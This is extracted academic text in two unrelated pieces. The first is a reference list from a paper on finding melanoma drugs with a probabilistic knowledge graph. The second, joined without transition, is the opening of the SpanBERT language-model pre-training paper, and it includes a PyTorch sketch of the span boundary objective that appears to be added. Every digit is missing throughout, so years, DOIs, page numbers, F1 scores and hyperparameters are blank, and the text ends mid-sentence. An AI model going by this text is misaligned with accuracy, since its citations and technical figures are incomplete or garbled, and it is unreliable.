the gene ontology annotation (goa) database: sharing knowledge in uniprot with gene ontology. nucleic acids research (suppl ):d –d doi . /nar/gkh . chapman pb, hauschild a, robert c, haanen jb, ascierto p, larkin j, dummer r, garbe c, testori a, maio m, hogg d, lorigan p, lebbe c, jouary t, schadendorf d, ribas a, o’day sj, sosman ja, kirkwood jm, eggermont am, dreno b, nolop k, li j, nelson b, hou j, lee rj, flaherty kt, mcarthur ga. . improved survival with vemurafenib in melanoma with braf v e mutation. new england journal of medicine ( ): – . chatr-aryamontri a, zanzoni a, ceol a, cesareni g. . searching the protein interaction space through the mint database. in: thompson jd, ueffing m, schaeffer-reiss c, eds. functional proteomics: methods and protocols. totowa: humana press, – doi . / - - - - _ . chautard e, fatoux-ardore m, ballut l, thierry-mieg n, ricard-blum s. . matrixdb, the extracellular matrix interaction database. nucleic acids research (suppl ):d –d doi . /nar/gkq . cheng f, liu c, jiang j, lu w, li w, liu g, zhou w, huang j, tang y. . prediction of drug- target interactions and drug repositioning via network-based inference. plos computational biology ( ):e doi . /journal.pcbi. . chiang ap, butte aj. . systematic evaluation of drug-disease relationships to identify leads for novel drug uses. clinical pharmacology and therapeutics ( ): – doi . /clpt. . . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://data.rpi.edu/xmlui/handle/ / http://dx.doi.org/ . /nar/gkg http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /bioinformatics/bti http://dx.doi.org/ . /nar/gkh http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /nar/gkq http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /clpt. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ clavo a, wahl r. . effects of hypoxia on the uptake of tritiated thymidine, l-leucine, l-methionine and fdg in cultured cancer cells. journal of nuclear medicine : – . d’alterio c, barbieri a, portella l, palma g, polimeno m, riccio a, ieranò c, franco r, scognamiglio g, bryce j, luciano a, rea d, arra c, scala s. . inhibition of stromal cxcr impairs development of lung metastases. cancer immunology immunotherapy ( ): – doi . /s - - - . doudican n, rodriguez a, osman i, orlow sj. . mebendazole induces apoptosis via bcl- inactivation in chemoresistant melanoma cells. molecular cancer research ( ): – doi . / - .mcr- - . dumontier m, baker cj, baran j, callahan a, chepelev l, cruz-toledo j, del rio nr, duck g, furlong li, keath n, klassen d, mccusker jp, queralt-rosinach n, samwald m, villanueva-rosales n, wilkinson md, hoehndorf r. . the semanticscience integrated ontology (sio) for biomedical research and knowledge discovery. journal of biomedical semantics ( ): doi . / - - - . emig d, ivliev a, pustovalova o, lancashire l, bureeva s, nikolsky y, bessarabova m. . drug target prediction and repositioning using an integrated network-based approach. plos one ( ):e doi . /journal.pone. . fiorentini g, aliberti c, del ca, tilli m, rossi s, ballardini p, turrisi g, benea g. . intra-arterial hepatic chemoembolization (tace) of liver metastases from ocular melanoma with slow-release irinotecan-eluting beads. early results of a phase ii clinical study. in vivo ( ): – . futreal pa, coin l, marshall m, down t, hubbard t, wooster r, rahman n, stratton mr. . a census of human cancer genes. nature reviews cancer ( ): – doi . /nrc . goll j, rajagopala sv, shiau sc, wu h, lamb bt, uetz p. . 
mpidb: the microbial protein interaction database. bioinformatics ( ): – doi . /bioinformatics/btn . gottlieb a, stein g, ruppin e, sharan r. . predict: a method for inferring novel drug indications with application to personalized medicine. molecular systems biology : doi . /msb. . . greenberg lh. . audiotoxicity and nephrotoxicity due to orally administered neomycin. jama ( ): – doi . /jama. . . . groth p, gibson a, velterop j. . the anatomy of a nanopublication. information services and use ( ): – . grover mp, ballouz s, mohanasundaram ka, george ra, sherman cdh, crowley tm, wouters ma. . identification of novel therapeutics for complex diseases from genome- wide association data. bmc medical genomics (suppl ):s doi . / - - -s -s . güldener u, münsterkötter m, oesterheld m, pagel p, ruepp a, mewes h-w, stümpflen v. . mpact: the mips protein interaction resource on yeast. nucleic acids research (suppl ):d –d doi . /nar/gkj . hamosh a, scott af, amberger js, bocchini ca, mckusick va. . online mendelian inheritance in man (omim), a knowledgebase of human genes and genetic disorders. nucleic acids research (suppl ):d –d . harris s, seaborne a, prud’hommeaux e. . sparql . query language. w c recommendation, . available at https://www.w .org/tr/sparql -query/. harrold jm, ramanathan m, mager de. . network-based approaches in drug discovery and early development. clinical pharmacology and therapeutics ( ): – doi . /clpt. . . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - .mcr- - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /nrc http://dx.doi.org/ . /bioinformatics/btn http://dx.doi.org/ . /msb. . http://dx.doi.org/ . /jama. . . http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /nar/gkj https://www.w .org/tr/sparql -query/ http://dx.doi.org/ . /clpt. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hauschild a, grob j-j, demidov lv, jouary t, gutzmer r, millward m, rutkowski p, blank cu, miller wh, kaempgen e, martn-algarra s, karaszewska b, mauch c, chiarion-sileni v, martin a-m, swann s, haney p, mirakhur b, guckert me, goodman v, chapman pb. . dabrafenib in braf-mutated metastatic melanoma: a multicentre open-label, phase randomised controlled trial. lancet ( ): – doi . /s - ( ) -x. held ma, langdon cg, platt jt, graham-steed t, liu z, chakraborty a, bacchiocchi a, koo a, haskins jw, bosenberg mw, stern df. . genotype-selective combination therapies for melanoma identified by high-throughput drug screening. cancer discovery ( ): – doi . / - .cd- - . hermjakob h, montecchi-palazzi l, bader g, wojcik j, salwinski l, ceol a, moore s, orchard s, sarkans u, von mering c, roechert b, poux s, jung e, mersch h, kersey p, lappe m, li y, zeng r, rana d, nikolski m, husi h, brun c, shanker k, grant sgn, sander c, bork p, zhu w, pandey a, brazma a, jacq b, vidal m, sherman d, legrain p, cesareni g, xenarios i, eisenberg d, steipe b, hogue c, apweiler r. . the hupo psi’s molecular interaction format—a community standard for the representation of protein interaction data. nature biotechnology ( ): – doi . /nbt . homsi j, cubitt cl, zhang s, munster pn, yu h, sullivan dm, jove r, messina jl, daud ai. . src activation in melanoma and src inhibitors as therapeutic agents in melanoma. melanoma research ( ): – doi . /cmr. b e c. humer j, ferko b, waltenberger a, rapberger r, pehamberger h, muster t. . azidothymidine inhibits melanoma cell growth in vitro and in vivo. 
melanoma research ( ): – doi . /cmr. b e aaaa . istituto clinico humanitas. . regorafenib in patients with metastatic solid tumors who have progressed after standard therapy (resound). available at https://clinicaltrials.gov/ct / show/nct (accessed january ). kerrien s, aranda b, breuza l, bridge a, broackes-carter f, chen c, duesbury m, dumousseau m, feuermann m, hinz u, jandrasits c, jimenez rc, khadake j, mahadevan u, masson p, pedruzzi i, pfeiffenberger e, porras p, raghunath a, roechert b, orchard s, hermjakob h. . the intact molecular interaction database in . nucleic acids research :d –d doi . /nar/gkr . keshava prasad ts, goel r, kandasamy k, keerthikumar s, kumar s, mathivanan s, telikicherla d, raju r, shafreen b, venugopal a, balakrishnan l, marimuthu a, banerjee s, somanathan ds, sebastian a, rani s, ray s, harrys kishore cj, kanth s, ahmed m, kashyap mk, mohmood r, ramachandra yl, krishna v, rahiman ba, mohan s, ranganathan p, ramabadran s, chaerkady r, pandey a. . human protein reference database— update. nucleic acids research (suppl ):d –d doi . /nar/gkn . kim kb, kefford r, pavlick ac, infante jr, ribas a, sosman ja, fecher la, millward m, mcarthur ga, hwu p, gonzalez r, ott pa, long gv, gardner os, ouellet d, xu y, demarini dj, le nt, patel k, lewis kd. . phase ii study of the mek /mek inhibitor trametinib in patients with metastatic braf-mutant cutaneous melanoma previously treated with or without a braf inhibitor. journal of clinical oncology ( ): – doi . /jco. . . . kim s, liu y, gaber mw, bumgardner jd, haggard wo, yang y. . development of chitosan-ellagic acid films as a local drug delivery system to induce apoptotic death of human melanoma cells. journal of biomedical materials research part b: applied biomaterials b( ): – doi . /jbm.b. . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . / - .cd- - http://dx.doi.org/ . /nbt http://dx.doi.org/ . /cmr. b e c http://dx.doi.org/ . /cmr. b e aaaa https://clinicaltrials.gov/ct /show/nct https://clinicaltrials.gov/ct /show/nct http://dx.doi.org/ . /nar/gkr http://dx.doi.org/ . /nar/gkn http://dx.doi.org/ . /jco. . . http://dx.doi.org/ . /jbm.b. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kingsmore sf, lindquist ie, mudge j, gessler dd, beavis wd. . genome-wide association studies: progress and potential for drug discovery and development. nature reviews drug discovery ( ): – doi . /nrd . kraut eh, walker mj, staubus a, gochnour d, balcerzak sp. . phase ii trial of topotecan in malignant melanoma. cancer investigation ( ): – doi . / . krauthammer m, kong y, bacchiocchi a, evans p, pornputtapong n, wu c, mccusker j, ma s, cheng e, straub r, serin m, bosenberg m, ariyan s, narayan d, sznol m, kluger h, mane s, schlessinger j, lifton r, halaban r. . exome sequencing identifies recurrent mutations in nf and rasopathy genes in sun-exposed melanomas. nature genetics ( ): – doi . /ng. . lamb j, crawford ed, peck d, modell jw, blat ic, wrobel mj, lerner j, brunet j-p, subramanian a, ross kn, reich m, hieronymus h, wei g, armstrong sa, haggarty sj, clemons pa, wei r, carr sa, lander es, golub tr. . the connectivity map: using gene-expression signatures to connect small molecules, genes, and disease. science ( ): – doi . /science. . le k, blomain es, rodeck u, aplin ae. . selective raf inhibitor impairs erk / phosphorylation and growth in mutant nras vemurafenib-resistant melanoma cells. pigment cell & melanoma research ( ): – doi . /pcmr. . 
lebo t, sahoo s, mcguinness d. . prov-o: the prov ontology. available at http://www.w .org/tr/prov-o/. lee m-y, kumar ra, sukumaran sm, hogg mg, clark ds, dordick js. . three-dimensional cellular microarray for high-throughput toxicology assays. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . lemontt j, azzaria m, gros p. . increased mdr gene expression and decreased drug accumulation in multidrug-resistant human melanoma cells. cancer research ( ): – . loiselle fb, morgan pe, alvarez bv, casey jr. . regulation of the human nbc na + /hco - cotransporter by carbonic anhydrase ii and pka. american journal of physiology-cell physiology ( ):c –c doi . /ajpcell. . . luikart s, kennealey g, kirkwood j. . randomized phase iii trial of vinblastine, bleomycin, and cis-dichlorodiammine-platinum versus dacarbazine in malignant melanoma. journal of clinical oncology ( ): – . lynn dj, winsor gl, chan c, richard n, laird mr, barsky a, gardy jl, roche fm, chan thw, shah n, lo r, naseer m, que j, yau m, acab m, tulpan d, whiteside md, chikatamarla a, mah b, munzner t, hokamp k, hancock rew, brinkman fsl. . innatedb: facilitating systems-level analyses of the mammalian innate immune response. molecular systems biology ( ): doi . /msb. . . mansuy m, nikkels-tassoudji n, arrese je, rorive a, nikkels af. . recurrent in situ melanoma successfully treated with ingenol mebutate. dermatology and therapy ( ): – doi . /s - - - . maraveyas a, johnson mj, xiao yp, noble s. . malignant melanoma as a target malignancy for the study of the anti-metastatic properties of the heparins. cancer and metastasis reviews ( ): – doi . /s - - -y. mcguinness dl, ding l, silva ppd, chang c. . pml : a modular explanation interlingua. in: proceedings of the aaai workshop on explanation-aware computing, vancouver, – . moller jt, cluitmans p, rasmussen ls, houx p, rasmussen h, canet j, rabbitt p, jolles j, larsen k, hanning cd, langeron o, johnson t, lauven pm, kristensen pa, biedler a, van beem h, fraidakis o, silverstein jh, beneken jew, gravenstein js. . long-term mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nrd http://dx.doi.org/ . / http://dx.doi.org/ . /ng. http://dx.doi.org/ . /science. http://dx.doi.org/ . /pcmr. http://www.w .org/tr/prov-o/ http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /ajpcell. . http://dx.doi.org/ . /msb. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ postoperative cognitive dysfunction in the elderly: ispocd study. lancet ( ): – doi . /s - ( ) - . motik b, patel-schneider pf, cuenca grau b. . owl web ontology language: direct semantics. available at https://www.w .org/tr/owl -direct-semantics/. nagy z, turcsik v, blaskó g. . the effect of lmwh (nadroparin) on tumor progression. pathology & oncology research ( ): – doi . /s - - - . naing a. . phase i dose escalation study of sodium stibogluconate (ssg) a protein tyrosine phosphatase inhibitor, combined with interferon alpha for patients with solid tumors. journal of cancer : – doi . /jca. . . national cancer institute. . carboplatin and paclitaxel with or without sorafenib tosylate in treating patients with stage iii or stage iv melanoma that cannot be removed by surgery. available at https://clinicaltrials.gov/ct /show/nct (accessed january ). pagel p, kovac s, oesterheld m, brauner b, dunger-kaltenbach i, frishman g, montrone c, mark p, stümpflen v, mewes h-w, ruepp a, frishman d. . 
the mips mammalian protein-protein interaction database. bioinformatics ( ): – doi . /bioinformatics/bti . pardo oe, wellbrock c, khanzada uk, aubert m, arozarena i, davidson s, bowen f, parker pj, filonenko vv, gout it, sebire n, marais r, downward j, seckl mj. . fgf- protects small cell lung cancer cells from apoptosis through a complex involving pkcepsilon, b-raf and s k . embo journal ( ): – doi . /sj.emboj. . patel k, doudican na, schiff pb, orlow sj. . albendazole sensitizes cancer cells to ionizing radiation. radiation oncology ( ): doi . / - x- - . peng x, wang f, li l, bum-erdene k, xu d, wang b, sinn aa, pollok ke, sandusky ge, li l, turchi jj, jalal si, meroueh so. . exploring a structural protein–drug interactome for new therapeutics in lung cancer. molecular biosystems ( ): doi . /c mb j. razick s, magklaras g, donaldson im. . irefindex: a consolidated protein interaction database with provenance. bmc bioinformatics ( ): doi . / - - - . richard c, david w, markus l. . rdf . concepts and abstract syntax. w c recommendation. available at https://www.w .org/tr/rdf -concepts/. ruepp a, waegele b, lechner m, brauner b, dunger-kaltenbach i, fobo g, frishman g, montrone c, mewes h-w. . corum: the comprehensive resource of mammalian protein complexes— . nucleic acids research (suppl ):d –d doi . /nar/gkp . sanseau p, koehler j. . editorial: computational methods for drug repurposing. briefings in bioinformatics ( ): – doi . /bib/bbr . sawada n, kataoka k, kondo k, arimochi h, fujino h, takahashi y, miyoshi t, kuwahara t, monden y, ohnishi y. . betulinic acid augments the inhibitory effects of vincristine on growth and lung metastasis of b f melanoma cells in mice. british journal of cancer ( ): – doi . /sj.bjc. . scott wa. . reliability of content analysis: the case of nominal scale coding. public opinion quarterly ( ): – doi . / . shen m, zhang y, saba n, austin cp, wiestner a, auld ds. . identification of therapeutic candidates for chronic lymphocytic leukemia from a library of approved drugs. plos one ( ):e doi . /journal.pone. . sirota m, dudley jt, kim j, chiang ap, morgan aa, sweet-cordero a, sage j, butte aj. . discovery and preclinical validation of drug indications using compendia of public gene expression data. science translational medicine ( ): ra doi . /scitranslmed. . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - ( ) - https://www.w .org/tr/owl -direct-semantics/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jca. . https://clinicaltrials.gov/ct /show/nct http://dx.doi.org/ . /bioinformatics/bti http://dx.doi.org/ . /sj.emboj. http://dx.doi.org/ . / - x- - http://dx.doi.org/ . /c mb j http://dx.doi.org/ . / - - - https://www.w .org/tr/rdf -concepts/ http://dx.doi.org/ . /nar/gkp http://dx.doi.org/ . /bib/bbr http://dx.doi.org/ . /sj.bjc. http://dx.doi.org/ . / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /scitranslmed. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ skrabanek l, saini hk, bader gd, enright aj. . computational prediction of protein- protein interactions. molecular biotechnology ( ): – doi . /s - - - . smalley ksm, contractor r, haass nk, kulp an, atilla-gokcumen ge, williams ds, bregman h, flaherty kt, soengas ms, meggers e, herlyn m. . an organometallic protein kinase inhibitor pharmacologically activates p and induces apoptosis in human melanoma cells. cancer research ( ): – doi . / - .can- - . sprinzak e, sattath s, margalit h. . 
how reliable are experimental protein–protein interaction data? journal of molecular biology ( ): – doi . /s - ( ) - . stark c, breitkreutz b-j, reguly t, boucher l, breitkreutz a, tyers m. . biogrid: a general repository for interaction datasets. nucleic acids research (suppl ):d –d doi . /nar/gkj . vogt i, prinz j, campillos m. . molecularly and clinically related drugs and diseases are enriched in phenotypically similar drug-disease pairs. genome medicine ( ): doi . /s - - -z. whitehead rp, moon j, mccachren ss, hersh em, samlowski we, beck jt, tchekmedyian ns, sondak vk. . a phase ii trial of vinorelbine tartrate in patients with disseminated malignant melanoma and one prior systemic therapy. cancer ( ): – doi . /cncr. . wilkinson m, vandervalk b, mccarthy l. . sadi semantic web services–cause you can’t always getwhat you want! in: ieee asia-pacific services computing conference (apscc). singapore: ieee, – . wishart ds, knox c, guo ac, shrivastava s, hassanali m, stothard p, chang z, woolsey j. . drugbank: a comprehensive resource for in silico drug discovery and exploration. nucleic acids research (suppl ):d –d doi . /nar/gkj . wu c, gudivada rc, aronow bj, jegga ag. . computational drug repositioning through heterogeneous network clustering. bmc systems biology (suppl ):s doi . / - - -s -s . wu z, wang y, chen l. . network-based drug repositioning. molecular biosystems ( ): – doi . /c mb a. xenarios i, salwinski l, duan xj, higney p, kim s-m, eisenberg d. . dip, the database of interacting proteins: a research tool for studying cellular networks of protein interactions. nucleic acids research ( ): – doi . /nar/ . . . yang l, agarwal p. . systematic drug repositioning based on clinical side-effects. plos one ( ):e doi . /journal.pone. . ye h, liu q, wei j. . construction of drug network based on side effects and its application for drug repositioning. plos one ( ):e doi . /journal.pone. . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - .can- - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /nar/gkj http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /cncr. http://dx.doi.org/ . /nar/gkj http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /c mb a http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ finding melanoma drugs through a probabilistic knowledge graph introduction results discussion materials and methods flink references spanbert: improving pre-training by representing and predicting spans mandar joshi∗† danqi chen∗‡§ yinhan liu§ daniel s. weld†� luke zettlemoyer†§ omer levy§ † allen school of computer science & engineering, university of washington, seattle, wa {mandar ,weld,lsz}@cs.washington.edu ‡ computer science department, princeton university, princeton, nj danqic@cs.princeton.edu � allen institute of artificial intelligence, seattle {danw}@allenai.org § facebook ai research, seattle {danqi,yinhanliu,lsz,omerlevy}@fb.com abstract we present spanbert, a pre-training method that is designed to better represent and predict spans of text. our approach extends bert by ( ) masking contiguous random spans, rather than random tokens, and ( ) training the span boundary representations to predict the entire content of the masked span, without relying on the individual token representations within it. 
spanbert consistently outperforms bert and our better-tuned baselines, with substantial gains on span selection tasks such as question answering and coreference reso- lution. in particular, with the same training data and model size as bertlarge, our single model obtains . % and . % f on squad . and . respectively. we also achieve a new state of the art on the ontonotes coreference resolution task ( . % f ), strong perfor- mance on the tacred relation extraction benchmark, and even gains on glue. introduction pre-training methods like bert (devlin et al., ) have shown strong performance gains using self-supervised training that masks individual words or subword units. however, many nlp tasks in- volve reasoning about relationships between two or more spans of text. for example, in extractive question answering (rajpurkar et al., ), de- ∗equal contribution. our code and pre-trained models are available at https:// github.com/facebookresearch/spanbert. termining that the ‘‘denver broncos’’ is a type of ‘‘nfl team’’ is critical for answering the ques- tion ‘‘which nfl team won super bowl ?’’ such spans provide a more challenging target for self supervision tasks, for example, predicting ‘‘denver broncos’’ is much harder than predicting only ‘‘denver’’ when you know the next word is ‘‘broncos’’. in this paper, we introduce a span- level pretraining approach that consistently out- performs bert, with the largest gains on span selection tasks such as question answering and coreference resolution. we present spanbert, a pre-training method that is designed to better represent and predict spans of text. our method differs from bert in both the masking scheme and the training objec- tives. first, we mask random contiguous spans, rather than random individual tokens. second, we introduce a novel span-boundary objective (sbo) so the model learns to predict the entire masked span from the observed tokens at its boundary. span-based masking forces the model to predict entire spans solely using the context in which they appear. furthermore, the sbo encourages the model to store this span-level information at the boundary tokens, which can be easily accessed during the fine-tuning stage. figure illustrates our approach. to implement spanbert, we build on a well- tuned replica of bert, which itself substantially outperforms the original bert. while building on our baseline, we find that pre-training on single segments, instead of two half-length segments with the next sentence prediction (nsp) objective, transactions of the association for computational linguistics, vol. , pp. – , . https://doi.org/ . /tacl a action editor: radu florian. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/facebookresearch/spanbert https://github.com/facebookresearch/spanbert https://doi.org/ . /tacl_a_ figure : an illustration of spanbert training. the span an american football game is masked. the sbo uses the output representations of the boundary tokens, x and x (in blue), to predict each token in the masked span. the equation shows the mlm and sbo loss terms for predicting the token, football (in pink), which as marked by the position embedding p , is the third token from x . considerably improves performance on most downstream tasks. 
therefore, we add our modifi- cations on top of the tuned single-sequence bert baseline. together, our pre-training process yields mod- els that outperform all bert baselines on a wide variety of tasks, and reach substantially better performance on span selection tasks in par- ticular. specifically, our method reaches . % and . % f on squad . and . (rajpurkar et al., , ), respectively—reducing error by as much as % compared with our tuned bert replica. we also observe similar gains on five additional extractive question answering benchmarks (newsqa, triviaqa, searchqa, hotpotqa, and natural questions). spanbert also arrives at a new state of the art on the challenging conll- (‘‘ontonotes’’) shared task for document-level coreference resolu- tion, where we reach . % f , exceeding the pre- vious top model by . % absolute. finally, we demonstrate that spanbert also helps on tasks that do not explicitly involve span selec- tion, and show that our approach even im- proves performance on tacred (zhang et al., ) and glue (wang et al., ). whereas others show the benefits of adding more data (yang et al., ) and increasing model size (lample and conneau, ), this work demonstrates the importance of designing we use the modified mrqa version of these datasets. see more details in section . . good pre-training tasks and objectives, which can also have a remarkable impact. background: bert bert (devlin et al., ) is a self-supervised approach for pre-training a deep transformer en- coder (vaswani et al., ), before fine-tuning it for a particular downstream task. bert opti- mizes two training objectives—masked language model (mlm) and next sentence prediction (nsp)— which only require a large collection of unlabeled text. notation given a sequence of word or sub- word tokens x = (x , x , . . . , xn), bert trains an encoder that produces a contextualized vector representation for each token: enc(x , x , . . . , xn) = x , x , . . . , xn. masked language model also known as a cloze test, mlm is the task of predicting missing tokens in a sequence from their placeholders. specifically, a subset of tokens y ⊆ x is sampled and substituted with a different set of tokens. in bert’s implementation, y accounts for % of the tokens in x; of those, % are replaced with [mask], % are replaced with a random token (according to the unigram distribution), and % are kept unchanged. the task is to predict the original tokens in y from the modified input. bert selects each token in y independently by randomly selecting a subset. in spanbert, we define y by randomly selecting contiguous spans (section . ). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april next sentence prediction the nsp task takes two sequences (xa, xb) as input, and predicts whether xb is the direct continuation of xa. this is implemented in bert by first reading xa from the corpus, and then ( ) either reading xb from the point where xa ended, or ( ) randomly sampling xb from a different point in the corpus. the two sequences are separated by a special [sep] token. additionally, a special [cls] token is added to xa, xb to form the input, where the target of [cls] is whether xb indeed follows xa in the corpus. in summary, bert optimizes the mlm and the nsp objectives by masking word pieces uniformly at random in data generated by the bi-sequence sampling procedure. in the next section, we will present our modifications to the data pipeline, masking, and pre-training objectives. 
model we present spanbert, a self-supervised pre- training method designed to better represent and predict spans of text. our approach is inspired by bert (devlin et al., ), but deviates from its bi-text classification framework in three ways. first, we use a different random process to mask spans of tokens, rather than individual ones. we also introduce a novel auxiliary objective—the sbo—which tries to predict the entire masked span using only the representations of the tokens at the span’s boundary. finally, spanbert samples a single contiguous segment of text for each train- ing example (instead of two), and thus does not use bert’s next sentence prediction objective, which we omit. . span masking given a sequence of tokens x = (x , x , . . . , xn), we select a subset of tokens y ⊆ x by iteratively sampling spans of text until the masking budget (e.g., % of x) has been spent. at each iteration, we first sample a span length (number of words) from a geometric distribution � ∼ geo(p), which is skewed towards shorter spans. we then ran- domly (uniformly) select the starting point for the span to be masked. we always sample a sequence of complete words (instead of subword tokens) and the starting point must be the beginning of one word. following preliminary trials, we set we experimented with p = { . , . , . } and found . to perform the best. figure : we sample random span lengths from a geometric distribution � ∼ geo(p = . ) clipped at �max = . p = . , and also clip � at �max = . this yields a mean span length of mean (�) = . . figure shows the distribution of span mask lengths. as in bert, we also mask % of the tokens in total: replacing % of the masked tokens with [mask], % with random tokens, and % with the original tokens. however, we perform this replacement at the span level and not for each token individually; that is, all the tokens in a span are replaced with [mask] or sampled tokens. . span boundary objective span selection models (lee et al., , ; he et al., ) typically create a fixed-length representation of a span using its boundary tokens (start and end). to support such models, we would ideally like the representations for the end of the span to summarize as much of the internal span content as possible. we do so by introducing a span boundary objective that involves predicting each token of a masked span using only the representations of the observed tokens at the boundaries (figure ). formally, we denote the output of the trans- former encoder for each token in the sequence by x , . . . , xn. given a masked span of tokens (xs, . . . , xe) ∈ y , where (s, e) indicates its start and end positions, we represent each token xi in the span using the output encodings of the external boundary tokens xs− and xe+ , as well as the position embedding of the target token pi−s+ : yi = f(xs− , xe+ , pi−s+ ) downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april where position embeddings p , p , . . . mark rela- tive positions of the masked tokens with respect to the left boundary token xs− . we implement the representation function f(·) as a -layer feed-forward network with gelu activations (hendrycks and gimpel, ) and layer normal- ization (ba et al., ): h = [xs− ; xe+ ; pi−s+ ] h = layernorm (gelu(w h )) yi = layernorm (gelu(w h )) we then use the vector representation yi to predict the token xi and compute the cross-entropy loss exactly like the mlm objective. 
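a minimal pytorch sketch of the span boundary objective head defined by the equations above. the class name, hidden sizes, and the separate output projection are assumptions (the paper reuses the input embedding matrix for the vocabulary projection, as noted in the next paragraph), but the two linear-gelu-layernorm stages mirror h1 and yi.

import torch
import torch.nn as nn

class SpanBoundaryHead(nn.Module):
    # f(x_{s-1}, x_{e+1}, p_{i-s+1}) -> logits over the word-piece vocabulary
    def __init__(self, hidden_size, max_span_len, vocab_size):
        super().__init__()
        self.pos_emb = nn.Embedding(max_span_len, hidden_size)  # relative position embeddings p_1, p_2, ...
        self.w1 = nn.Linear(3 * hidden_size, hidden_size)
        self.w2 = nn.Linear(hidden_size, hidden_size)
        self.ln1 = nn.LayerNorm(hidden_size)
        self.ln2 = nn.LayerNorm(hidden_size)
        self.act = nn.GELU()
        self.to_vocab = nn.Linear(hidden_size, vocab_size)      # tied to the input embeddings in the paper

    def forward(self, x_left, x_right, rel_pos):
        # x_left, x_right: encoder outputs for the boundary tokens x_{s-1}, x_{e+1}, shape (batch, hidden)
        # rel_pos: position of the target token relative to the left boundary, shape (batch,)
        h0 = torch.cat([x_left, x_right, self.pos_emb(rel_pos)], dim=-1)
        h1 = self.ln1(self.act(self.w1(h0)))
        y = self.ln2(self.act(self.w2(h1)))
        return self.to_vocab(y)  # scored with cross-entropy against the masked token, exactly as in mlm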
spanbert sums the loss from both the span boundary and the regular masked language model objectives for each token xi in the masked span (xs, . . . , xe), while reusing the input embedding (press and wolf, ) for the target tokens in both mlm and sbo: l(xi) = lmlm(xi) + lsbo(xi) = − log p (xi | xi) − log p (xi | yi) . single-sequence training as described in section , bert’s examples con- tain two sequences of text (xa, xb), and an objective that trains the model to predict whether they are connected (nsp). we find that this set- ting is almost always worse than simply using a single sequence without the nsp objective (see section for further details). we conjecture that single-sequence training is superior to bi-sequence training with nsp because (a) the model benefits from longer full-length contexts, or (b) condi- tioning on, often unrelated, context from an- other document adds noise to the masked language model. therefore, in our approach, we remove both the nsp objective and the two-segment sam- pling procedure, and simply sample a single con- tiguous segment of up to n = tokens, rather than two half-segments that sum up to n tokens together. in summary, spanbert pre-trains span repre- sentations by: ( ) masking spans of full words using a geometric distribution based masking scheme (section . ), ( ) optimizing an auxiliary span-boundary objective (section . ) in addition to mlm using a single-sequence data pipeline (section . ). a procedural description can be found in appendix a. experimental setup . tasks we evaluate on a comprehensive suite of tasks, including seven question answering tasks, coref- erence resolution, nine tasks in the glue bench- mark (wang et al., ), and relation extraction. we expect that the span selection tasks, question answering and coreference resolution, will partic- ularly benefit from our span-based pre-training. extractive question answering given a short passage of text and a question as input, the task of extractive question answering is to select a contiguous span of text in the passage as the answer. we first evaluate on squad . and . (rajpurkar et al., , ), which have served as major question answering benchmarks, particularly for pre-trained models (peters et al., ; devlin et al., ; yang et al., ). we also evaluate on five more datasets from the mrqa shared task (fisch et al., ) : newsqa (trischler et al., ), searchqa (dunn et al., ), triviaqa (joshi et al., ), hotpotqa (yang et al., ), and natural questions (kwiatkowski et al., ). because the mrqa shared task does not have a public test set, we split the development set in half to make new development and test sets. the datasets vary in both domain and collection meth- odology, making this collection a good test bed for evaluating whether our pre-trained models can generalize well across different data distributions. following bert (devlin et al., ), we use the same qa model architecture for all the data- sets. we first convert the passage p = (p , p , . . . , pl) and question q = (q , q , . . . , ql′) into a single sequence x = [cls]p p . . . pl[sep] q q . . . ql′[sep], pass it to the pre-trained trans- former encoder, and train two linear classifiers independently on top of it for predicting the answer span boundary (start and end). for the unanswer- able questions in squad . , we simply set the https://github.com/mrqa/mrqa-shared- task- . 
